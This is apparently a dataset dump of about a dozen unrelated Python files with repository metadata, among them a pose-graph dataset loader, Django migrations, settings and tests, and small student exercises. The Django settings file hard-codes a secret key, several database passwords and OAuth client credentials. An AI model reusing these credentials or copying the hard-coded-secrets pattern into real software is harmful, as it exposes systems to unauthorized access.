    mean of a1[q..p], i.e. (p - q + 1) / sum(1 / el), is printed with six
    decimals.  Relies on the module-level `n` (number of queries).
    """
    for _ in range(n):
        q, p = map(int, input().split())
        # Bug fix: reset the accumulator for every query.  Previously `summ`
        # was initialised once before the loop, so the 1/el terms accumulated
        # across queries and every answer after the first was wrong.
        summ = 0
        for el in a1[q:p + 1]:
            summ += 1 / el
        print("{0:.6f}".format((p - q + 1) / summ))
func(a)
| [
"zhgunksenia@gmail.com"
] | zhgunksenia@gmail.com |
e13655cec855a0e54a334077cef0693f13d2836a | 75485f3371f5f3c786e021b2657c6750120a5d09 | /PoseBallRelationDataset.py | 8bffe4a45869e1bfec02eccfbc4f179b7e605858 | [] | no_license | icicle4/PoseObjRelation | af0b138072e04d8d71d913ae1751b7dbe32bbbbe | 4f55f8bed99663181ec03e9a27575e33a5459418 | refs/heads/master | 2020-11-28T01:21:47.133144 | 2019-12-23T03:15:53 | 2019-12-23T03:15:53 | 229,667,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,415 | py | import json
from itertools import groupby
import cv2
import os
import numpy as np
import torch
from torch_geometric.data import Data, DataLoader
from util_tools.util import center_bbox, draw_skeleton_in_frame, draw_box_in_frame, area
import random
def relation_mask_visualization(image, related_mask, kp, human_box):
    """Debug helper: blend the related-region mask into `image`, then draw the
    person's skeleton and bounding box on top, returning the composite."""
    highlighted = cv2.bitwise_and(
        image, image, mask=related_mask.astype(np.uint8)
    )
    blended = cv2.addWeighted(image, 0.5, highlighted, 0.5, 1)
    blended = draw_skeleton_in_frame(blended, np.array(kp)[:, :2])
    blended = draw_box_in_frame(blended, human_box)
    return blended
def return_dataset(cfg):
    """Build (train, test) sample lists from the json annotations under cfg.data_path."""
    train_dataset = PoseBallRelationDataset(os.path.join(cfg.data_path,
                                                         'sports_ball_action_{}.json'.format('train'))).datas
    test_dataset = PoseBallRelationDataset(os.path.join(cfg.data_path,
                                                         'sports_ball_action_{}.json'.format('test'))).datas
    print('train sample: {}'.format(len(train_dataset)))
    print('test sample: {}'.format(len(test_dataset)))
    return train_dataset, test_dataset
class PoseBallRelationDataset:
    """Builds graph samples (torch_geometric ``Data``) relating human poses to
    ball locations, from a json annotation file.

    For every annotated person, grid positions on the image are labelled
    positive (inside a connected object's box) or negative, and each position
    yields one 17-node skeleton graph whose node features are the keypoints
    expressed relative to that position.
    """
    def __init__(self, json_path, stride=4):
        # stride: sampling step (in pixels) of the image grid scanned below.
        self.stride = stride
        self.json_path = json_path
        self.load_json()
        self.transform_to_possible_format()  # populates self.datas
    def load_json(self):
        """Load the annotation dict {image_path: annotation} into self.annotations."""
        with open(self.json_path, 'r') as f:
            annotations = json.load(f)
        self.annotations = annotations
    def fill_mask(self, mask, box, method):
        """Mark the region of `box` (xmin, ymin, xmax, ymax) in `mask`.

        Only method='fill' (binary fill with 1.0) is implemented.
        """
        if method == 'gaussian':
            # NOTE(review): placeholder — the centre is computed but nothing
            # is written, so 'gaussian' silently returns the mask unchanged
            # (unlike the explicit NotImplementedError taken by other methods).
            center = center_bbox(box)
            pass
        elif method == 'fill':
            xmin, ymin, xmax, ymax = box
            mask[ymin: ymax + 1, xmin: xmax + 1] = 1.0
        else:
            raise NotImplementedError('coming soon')
        return mask
    def group_same_connection(self, connections_with_action_id):
        """Return the distinct connections, dropping each entry's action id.

        Keeps x[0] (the connection, unpacked later as (human_ind, obj_ind))
        for each group.  NOTE(review): itertools.groupby only merges
        *adjacent* equal keys, so the input is assumed pre-grouped — confirm.
        """
        new_connections = list()
        for c, v in groupby(connections_with_action_id, key=lambda x: x[0]):
            new_connections.append(
                c
            )
        return new_connections
    def related_vec(self, kp, human_box, related_pos):
        """Return keypoints translated so `related_pos` is the origin and
        scaled by the person's size (sqrt of the human-box area)."""
        kp = np.asarray(kp, dtype=np.float32)
        human_area = area(human_box)
        human_radius = human_area ** 0.5
        related_x, related_y = related_pos
        kp[:, 0] -= related_x
        kp[:, 1] -= related_y
        kp[:, :2] /= human_radius
        return kp
    def transform_to_relate_vec(self, related_mask, stride):
        """Scan the mask on a `stride` grid; return ((x, y) positions inside
        the mask, (x, y) positions outside it)."""
        height, width = related_mask.shape[:2]
        positive_positions, negative_positions = list(), list()
        for h in range(0, height, stride):
            for w in range(0, width, stride):
                if related_mask[h, w] == 1.0:
                    positive_positions.append((w, h))
                else:
                    negative_positions.append((w, h))
        return positive_positions, negative_positions
    def balance_vecs(self, positive_vecs, negative_vecs):
        """Randomly downsample whichever class exceeds the other by more than
        1.8x, so the two lists end up roughly balanced."""
        if len(negative_vecs) > 1.8 * len(positive_vecs):
            N = len(positive_vecs)
            M = len(negative_vecs)
            sample_inds = random.sample(list(range(0, M)), N)
            sampled_negative_vecs = [
                negative_vecs[i] for i in sample_inds
            ]
            return positive_vecs, sampled_negative_vecs
        if len(positive_vecs) > 1.8 * len(negative_vecs):
            N = len(positive_vecs)
            M = len(negative_vecs)
            sample_inds = random.sample(list(range(0, N)), M)
            sampled_positive_vecs = [
                positive_vecs[i] for i in sample_inds
            ]
            return sampled_positive_vecs, negative_vecs
        return positive_vecs, negative_vecs
    def graph_data_handle(self, vecs, class_id):
        """Wrap node features `vecs` into a torch_geometric Data, with the
        fixed 17-node skeleton below (both edge directions listed) and
        graph label `class_id`."""
        x = torch.from_numpy(vecs).float()
        y = torch.tensor([class_id]).long()
        edge_index = torch.tensor(
            [[0, 1, 0, 2, 5, 5, 7, 6, 8, 5, 6, 11, 11, 12, 13, 14,
              1, 3, 2, 4, 6, 7, 9, 8, 10, 11, 12, 12, 13, 14, 15, 16],
             [1, 3, 2, 4, 6, 7, 9, 8, 10, 11, 12, 12, 13, 14, 15, 16,
              0, 1, 0, 2, 5, 5, 7, 6, 8, 5, 6, 11, 11, 12, 13, 14]
             ], dtype=torch.long
        )
        return Data(x=x, edge_index=edge_index, y=y)
    def transform_to_possible_format(self):
        """Build self.datas: a single shuffled list of positive and negative
        graph samples over every annotated person in every image."""
        all_positive_datas = []
        all_negative_datas = []
        for file_name, ann in self.annotations.items():
            kps = ann['kps']
            objs = ann['obj_boxs']
            human_boxs = ann['human_boxs']
            for i, kp in enumerate(kps):
                if kp is None:
                    continue
                else:
                    # The image is read only for its size (mask dimensions).
                    image = cv2.imread(file_name)
                    height, width = image.shape[:2]
                    related_mask = np.zeros((height, width), dtype=np.float32)
                    connection_with_action = ann['connection_with_action']
                    new_connections = self.group_same_connection(connection_with_action)
                    human_box = human_boxs[i]
                    # Fill the mask with every object box connected to person i.
                    for c in new_connections:
                        human_ind, obj_ind = c
                        if human_ind == i:
                            obj_box = objs[obj_ind]
                            related_mask = self.fill_mask(related_mask, obj_box, method='fill')
                    # image = relation_mask_visualization(image, related_mask, kp, human_box)
                    # cv2.imshow('res', image)
                    # cv2.waitKey(0)
                    positive_positions, negative_positions = self.transform_to_relate_vec(related_mask, self.stride)
                    positive_positions, negative_positions = self.balance_vecs(positive_positions, negative_positions)
                    positive_data = [
                        self.graph_data_handle(self.related_vec(kp, human_box, pos), 1) for pos in positive_positions
                    ]
                    negative_data = [
                        self.graph_data_handle(self.related_vec(kp, human_box, pos), 0) for pos in negative_positions
                    ]
                    all_positive_datas.extend(positive_data)
                    all_negative_datas.extend(negative_data)
        datas = all_positive_datas + all_negative_datas
        random.shuffle(datas)
        self.datas = datas
| [
"icicle4@icloud.com"
] | icicle4@icloud.com |
f5dbebfd08d2bedf77c3816adce2bd252fdfde3b | 629efe629347d3b3ee3857ff29f6c615a9e51115 | /transport/migrations/0017_auto_20200508_0418.py | ae35b7b9b8fae2ffefd615e9d40463ee3587c4e0 | [] | no_license | abdulhanan/wsite | 8a56bd873241c5c13295da33eddf930f10a0ad6c | f6dbb69139f5ce3b53a598086fe2fcd79483467e | refs/heads/master | 2022-06-21T11:45:04.684861 | 2020-05-12T00:55:56 | 2020-05-12T00:55:56 | 263,194,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | # Generated by Django 3.0.5 on 2020-05-07 23:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: make TransportBooking.transport a blank-able CharField(50)."""
    dependencies = [
        ('transport', '0016_auto_20200508_0414'),
    ]
    operations = [
        migrations.AlterField(
            model_name='transportbooking',
            name='transport',
            field=models.CharField(blank=True, max_length=50),
        ),
    ]
| [
"11beseahanan@seecs.edu.pk"
] | 11beseahanan@seecs.edu.pk |
0a1469a82f87c708f4fe024503284be3397f152d | 3d669e500ba485fc4520a2aca3ff6bd94bd9a87e | /LAB2/converter.py | 758071a22ff3b144454cc6afe972bc6814abbdbc | [] | no_license | LuisAlvelaMendes/CMO | 7b7d78f1e0b373990a39a6da237987c5ab512248 | 85e8fca7dae27674ca08e3f8ac1cb8903b4e1ed6 | refs/heads/master | 2021-03-16T11:32:12.498058 | 2020-04-12T20:51:19 | 2020-04-12T20:51:19 | 246,901,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | """
Range 60,0dB -120,0dBm
Mobile unit 1 Mobile Terminal 00,00000 000,00000 0,0
Fixed unit 2 Monte da Virgem 41,11313 -008,59838 200,1
Fixed unit 3 Sardoura 41,04918 -008,31171 316,6
Fixed unit 4 Resende 41,13410 -007,98018 552,6
Fixed unit 7 Exercise3Celorico 41,33887 -007,84056 1301,0
Fixed unit 8 Exercise3Felgueiras 41,32088 -008,28529 502,6
"""
import pandas as pd
from pandas import ExcelWriter
from pandas import ExcelFile
# Load the measurement sheet; columns used below: 'Pr(dBm)' (received power),
# 'Rx(dB)' and 'BestUnit' (serving site id — see the header docstring above).
df = pd.read_excel('question3/exercise3.xlsx', sheet_name='Sheet2')
""" histogram
import matplotlib.pyplot as plt
powersReceived = df['Pr(dBm)']
powersReceived.hist(normed=0, histtype='stepfilled', bins=20)
plt.xlabel('Power Received (dBm)',fontsize=15)
plt.ylabel('Samples',fontsize=15)
plt.show()
"""
""" scatter plots
plt.subplot(1,2,1)
plt.scatter(df['BestUnit'], df['Pr(dBm)'],color='b',s=120, linewidths=2,zorder=10)
plt.xlabel('Unit',fontsize=15)
plt.ylabel('Power Received (dBm)',fontsize=15)
plt.gcf().set_size_inches((20,6))
"""
"""
used for exercises 1, 2 and 3
"""
# Percentage of sample locations whose received power is below each threshold.
lessThan120 = df[(df['Pr(dBm)'] < -120)]
lessThan110 = df[(df['Pr(dBm)'] < -110)]
print("Percentagem Pr < -120:",(len(lessThan120.index))/float(len(df.index)) * 100)
print("Percentagem Pr < -110:",(len(lessThan110.index))/float(len(df.index)) * 100)
# Bin the samples into 10 dB-wide Rx(dB) bands.
# NOTE(review): only the 20-30 band is printed; the other band variables are
# currently unused (presumably inspected interactively) — confirm.
between0and10 = df[(df['Rx(dB)'] < 10) & (df['Rx(dB)'] >= 0)]
between10and20 = df[(df['Rx(dB)'] < 20) & (df['Rx(dB)'] >= 10)]
between20and30 = df[(df['Rx(dB)'] < 30) & (df['Rx(dB)'] >= 20)]
between30and40 = df[(df['Rx(dB)'] < 40) & (df['Rx(dB)'] >= 30)]
between40and50 = df[(df['Rx(dB)'] < 50) & (df['Rx(dB)'] >= 40)]
between50and60 = df[(df['Rx(dB)'] < 60) & (df['Rx(dB)'] >= 50)]
above60 = df[(df['Rx(dB)'] >= 60)]
print("Percentagem maior: ", (len(between20and30.index))/float(len(df.index)) * 100)
"""
used for exercise 4
"""
# Count sample locations best served by the two new sites (units 7 and 8).
newSitesAsBestUnit = df[(df['BestUnit'] == 8) | (df['BestUnit'] == 7)]
siteAsBestUnit7 = df[(df['BestUnit'] == 7)]
siteAsBestUnit8 = df[(df['BestUnit'] == 8)]
print("Locations with new sites as best unit:", len(newSitesAsBestUnit.index))
print("Locations with site 7 as best unit (celorico):", len(siteAsBestUnit7.index))
print("Locations with site 8 as best unit (felgueiras):", len(siteAsBestUnit8.index))
"noreply@github.com"
] | LuisAlvelaMendes.noreply@github.com |
a170f3cdb43383b1106e3eac04e7a20a7ae1edc5 | b3136ce22bf1a2025864463b08e1bf2b404e810c | /uuthenguyento.py | 5b141670540eb3df25082642530e905ed0504660 | [] | no_license | Keybinhoainam/Python | 21c02664b24fbaad881f54a6ded31546af05ea6f | 1d3555934cfe668618bf7fb8dfdfb8017867c320 | refs/heads/master | 2023-08-28T15:32:55.829094 | 2021-11-05T15:10:17 | 2021-11-05T15:10:17 | 401,331,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | import math
def kt(vtnt, n=10000):
    """Append all primes <= `n` to `vtnt`, in increasing order.

    Sieve of Eratosthenes.  `n` defaults to 10000 (the original hard-coded
    limit), so existing callers are unaffected; passing a different bound
    generalizes the sieve.

    Args:
        vtnt: output list; primes are appended to it in place.
        n: inclusive upper bound of the sieve.
    """
    check = [0] * (n + 5)  # check[i] == 1 once i is known composite
    for i in range(2, n + 1):
        if check[i] == 0:  # i was never crossed out, so it is prime
            vtnt.append(i)
            # Cross out multiples starting at i*i (smaller ones were already
            # crossed out by smaller prime factors).
            for j in range(i * i, n + 1, i):
                check[j] = 1
# For each test case: read a string and answer YES iff its length is a prime
# number AND prime digits (2, 3, 5, 7) strictly outnumber the other characters.
test=int(input())
for t in range(test):
    s=input()
    vtnt=[]
    snt=['2','3','5','7']  # the prime digit characters
    # NOTE(review): the sieve over [2, 10000] is rebuilt for every test case,
    # and `n in vtnt` below is a linear scan over the prime list; hoisting
    # kt() out of the loop and using a set would be much faster.
    kt(vtnt)
    n=len(s)
    dem=0  # number of prime-digit characters found in s
    for i in s:
        if(i in snt):dem+=1
    if(n in vtnt and dem>(n-dem)):print("YES")
    else:print("NO")
"keybinhoainam@gmail.com"
] | keybinhoainam@gmail.com |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb | 1c390cd4fd3605046914767485b49a929198b470 | /leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py | 20d18c287b19a6543b31a2e3550bee7c771d1829 | [] | no_license | wwwwodddd/Zukunft | f87fe736b53506f69ab18db674311dd60de04a43 | 03ffffee9a76e99f6e00bba6dbae91abc6994a34 | refs/heads/master | 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | class Solution:
def numOfWays(self, a: List[int]) -> int:
z = factorial(len(a))
def F(a):
nonlocal z
if a:
z //= len(a)
F([i for i in a if i < a[0]])
F([i for i in a if i > a[0]])
F(a)
return (z - 1) % 1000000007 | [
"wwwwodddd@gmail.com"
] | wwwwodddd@gmail.com |
b5ddde85e380c31b0774555e01f85bf4d5760467 | 5cfd0d94d25e617c8a39bac4e73fa37125ed2c2d | /DGM/models/modifiedgooglenet.py | 0f76dc1a5e4211650f04e9323227d067da3c1d80 | [] | no_license | boyuanmike/Adversarial-Metric-Learning | f6c37e641f93ae971ee11024f27ae1c5d5c1dff3 | 59be862f3f113d45d1edf39b5d88eb9168adc6f0 | refs/heads/master | 2020-04-30T12:28:37.263588 | 2019-04-30T04:27:35 | 2019-04-30T04:27:35 | 176,827,443 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # This file is the pytorch implementation of https://github.com/duanyq14/DAML/blob/master/lib/models/modified_googlenet.py
import torch
import torch.nn as nn
from models.google_net import googlenet
class ModifiedGoogLeNet(nn.Module):
def __init__(self, out_dims=64, normalize_output=False):
super(ModifiedGoogLeNet, self).__init__()
self.googlenet = googlenet(pretrained=True)
self.googlenet.fc = nn.Linear(in_features=1024, out_features=out_dims)
self.normalize_output = normalize_output
def forward(self, x):
if self.training and self.googlenet.aux_logits:
*_, y = self.googlenet(x)
else:
y = self.googlenet(x)
if self.normalize_output:
y_norm = torch.norm(y, p=2, dim=1, keepdim=True)
y = y / y_norm.expand_as(y)
return y
| [
"noreply@github.com"
] | boyuanmike.noreply@github.com |
9dbbb0c7a4050d651f17d49dbb915c95b9882ed3 | d3e1472a78922f221721fad914fdf3278ce5d10f | /ServiciosParlamentarios/environments/prod/settings.py | d4a4071bdc34fba298e9b3dc91e89fdc84bda60a | [] | no_license | gdebenedetti/spd-back-end | 76b9ec2cb7b630855e8729b8ac5d199ba8abfcc0 | 4163d615876316945912a5f9cbbd5005d334678c | refs/heads/master | 2021-01-24T02:38:40.925036 | 2016-01-08T19:01:41 | 2016-01-08T19:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,443 | py | """
Django settings for ServiciosParlamentarios project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from datetime import date
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c8qmje5ow7r5e)uri*t^baev!*rw-a&z*=om5&op&pn872h&!5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['*',]
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'sslserver',
'apirest',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
)
CORS_ORIGIN_ALLOW_ALL = True
ROOT_URLCONF = 'ServiciosParlamentarios.urls'
WSGI_APPLICATION = 'ServiciosParlamentarios.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'servicios', #name of the django database
'USER': 'postgres', #user of the django database
'PASSWORD': 'hLsPLeYRSR', #password of the django database
'HOST': 'localhost',
'PORT': '5432',
},
'pap_nueva_pruebas': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dp_prod', #PROD
'USER': 'postgres',
'PASSWORD': 'XBdFBU3hDGZe',
'HOST': '186.33.210.54',
'PORT': '5432',
},
'pap_nueva_pruebas_test': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dp_prod_test', #TEST
'USER': 'postgres',
'PASSWORD': 'XBdFBU3hDGZe',
'HOST': '186.33.210.54',
'PORT': '5432',
}
}
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
gettext_noop = lambda s: s
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'America/Argentina/Buenos_Aires'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = (
('es', gettext_noop('Spanish')),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
# 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
# 'DEFAULT_PERMISSION_CLASSES': ('apirest.authorizers.authorizator.has_permission',),
'DEFAULT_FILTER_BACKENDS': (
'rest_framework.filters.DjangoFilterBackend',
'rest_framework.filters.SearchFilter',
'rest_framework.filters.OrderingFilter',
), #pip install django-filter
'DEFAULT_RENDERER_CLASSES': (
'apirest.utils.JSONURenderer.JSONURenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'PAGINATE_BY': 20,
'PAGINATE_BY_PARAM': 'page_size',
'MAX_PAGINATE_BY': 100
}
DATABASE_ROUTERS = ['apirest.routers.apirest_router.ApirestRouter','apirest.routers.default_router.DefaultRouter']
# Authentication Server
AUTH_SERVER = {
'HOST': 'oauth2.hcdn.gob.ar',
'PORT': '9000',
'RESOURCE_NAME': 'servicios-parlamentarios',
}
# Oauth2 client credentials
AUTH_CLIENT_CREDENTIALS = {
'CLIENT_ID': '=yEvTDB6GU34syMA0n63RD8OQxgCec6w32KDC9Am',
'CLIENT_SECRET': '4BxxY7C4_jM!l4JlYe!1f;LuFRMf=!M;iabG;Mjad:hmnZ.Ma.Go=@9hYqIc5fwKAWg=rr_fxXW6bAP-iRUoZrTDK!fILZ;1u-nf@@ksDHKlX;k!h2jrGMQJ;F70!abw',
}
AUTHENTICATION = True
from datetime import datetime
LOGGING = {
'version': 1,
'formatters': {
'verbose': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/var/log/ServiciosParlamentarios/' + datetime.now().strftime('ServiciosParlamentarios_%d_%m_%Y.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'level': 'DEBUG',
'handlers': ['file'],
'propagate': True
},
'apirest': {
'level': 'DEBUG',
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True
},
},
}
| [
"giopromolla@gmail.com"
] | giopromolla@gmail.com |
4d39a6fff8aa5c95aaf2abec67e4ef353428512e | 0e78b0dd8a27820500ab94308fbf7f45da451d47 | /Python/100 challenges/day 9 -301- 37/c35 - print last five square list.py | 802bad34c82eff4b2b0db1718d5c336d03403954 | [] | no_license | RLeary/projects | afc1d567fbddcc29ff1b0f65938b42d59b145636 | c55cf6d4ee60d2d2f5b647e870c07b5a88d58f7d | refs/heads/master | 2020-12-05T12:03:46.546716 | 2020-03-11T14:32:30 | 2020-03-11T14:32:30 | 232,103,586 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # Define a function which can generate a list where the values are square of
# numbers between 1 and 20 (both included). Then the function needs to print
# the last 5 elements in the list.
#
# Hints:
# Use ** operator to get power of a number.Use range() for loops.Use
# list.append() to add values into a list.Use [n1:n2] to slice
LOWER_LIMIT = 1
UPPER_LIMIT = 21
def print_square_list_last_five():
sqaure_list = [i ** 2 for i in range(LOWER_LIMIT, UPPER_LIMIT)]
print(sqaure_list[-5:])
print_square_list_last_five()
# Given solutions
"""
def printList():
li=list()
for i in range(1,21):
li.append(i**2)
print(li[-5:])
printList()
# OR
def printList():
lst = [i ** 2 for i in range(1, 21)]
for i in range(19,14,-1):
print(lst[i])
printList()
"""
| [
"ruaraidh@live.com"
] | ruaraidh@live.com |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc | d880b55d45726a9b9b12d24b059769350eeb6fb6 | /app/tests/test_eventactions.py | 0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1 | [
"Apache-2.0"
] | permissive | twatchy/cito_engine | 261a0bbf0dbdf1fe8cca19f598972307bc7df1c7 | a62dce3c76567dd36b7efcaa70e03728b335f44e | refs/heads/master | 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 | Apache-2.0 | 2019-02-07T06:57:48 | 2019-02-07T06:57:43 | Python | UTF-8 | Python | false | false | 4,329 | py | """Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
"""
X = 2, Y=100
Case 1
* One incident in T secs
* 2nd at T+10, 3rd at T+11, 4th at T+51
* Assert we have 1 single incident, 4 logs and event action executed once
* 5th incident occurs at T+101
* Assert counters are reset
* 6th incident occurs at T+151
* Assert event action is executed for the second time
"""
def setUp(self):
self.event = factories.EventFactory.create()
self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)
@patch('cito_engine.actions.incidents.requests')
def test__single_event_action_execution(self, mock_requests):
T = int(time())
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
eventpoller = EventPoller()
self.assertTrue(eventpoller.parse_message(raw_incident))
incident = Incident.objects.filter()[0]
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# 2nd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T+10)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#3rd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 11)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# 4th incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 51)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#We should have one incident and 4 incident logs
self.assertEqual(Incident.objects.count(), 1)
self.assertEqual(IncidentLog.objects.count(), 4)
# Assert we only execute plugin once
self.assertEqual(mock_requests.post.call_count, 1)
# 5th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 101)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# Assert we did not execute plugin yet
self.assertEqual(mock_requests.post.call_count, 1)
# 6th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 121)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# Assert event action occurred for the second time
self.assertEqual(mock_requests.post.call_count, 2)
#todo create tests to check use cases mentioned in the comments | [
"cyrus@extremeunix.com"
] | cyrus@extremeunix.com |
4394513dce3447ce23c63b1b1c2f1cb7e8496e66 | f2224bac9f28ec73b9f12719983af42524ad2b28 | /filehandeling.py | 573b70d92e37f8543ec233b8f0b97e67b1563da9 | [] | no_license | WeerakoonOS/Python-Codes-1st-sem | fd5b8c87fe8ed2828f88af2ead00cf5826120822 | 8251a7bbb837a4699c00dff511836142bbc6b1c4 | refs/heads/master | 2020-04-06T04:43:06.891945 | 2017-02-23T05:33:09 | 2017-02-23T05:33:09 | 82,888,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | file=open('f.txt','w')
file.write('My favorite subject is ICT\n')
file.write('My school is located in the western province\n')
file.write('My parents are providing expenses for my education\n')
file.close()
file1=open('f.txt','a')
file1.write('Sri Lanka is one of the beautiful country in the world\n')
file1.close()
file2=open('f.txt')
str1=file2.readline()
str2=file2.readline()
str3=file2.readline()
str4=file2.readline()
print(str1, str2, str3, str4)
file2.close()
file3=open('f.txt')
for line in file3:
print(line)
file3.close()
| [
"oswucsc@gmail.com"
] | oswucsc@gmail.com |
97881fac8f0fc31d32cb2dcfab394222d5961334 | 9bd6caf9c42ac67dfcb120af272d8e65d8f6a9f6 | /venv/bin/python-config | 473844071904928c2233c7ec06d5e3c88290dd42 | [] | no_license | haedal-with-knu/KNUstudents | f6da8e8c112af317addeb1cccaca9f3bfa6bcacc | 6fc88e5699cc27fbf9f7b6437d84b249e450232e | refs/heads/master | 2020-06-30T13:25:20.994394 | 2019-10-13T14:58:36 | 2019-10-13T14:58:36 | 200,837,311 | 1 | 6 | null | 2019-10-13T14:06:47 | 2019-08-06T11:24:16 | CSS | UTF-8 | Python | false | false | 2,360 | #!/Users/kangminchoi/haedal/KNUstudents/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
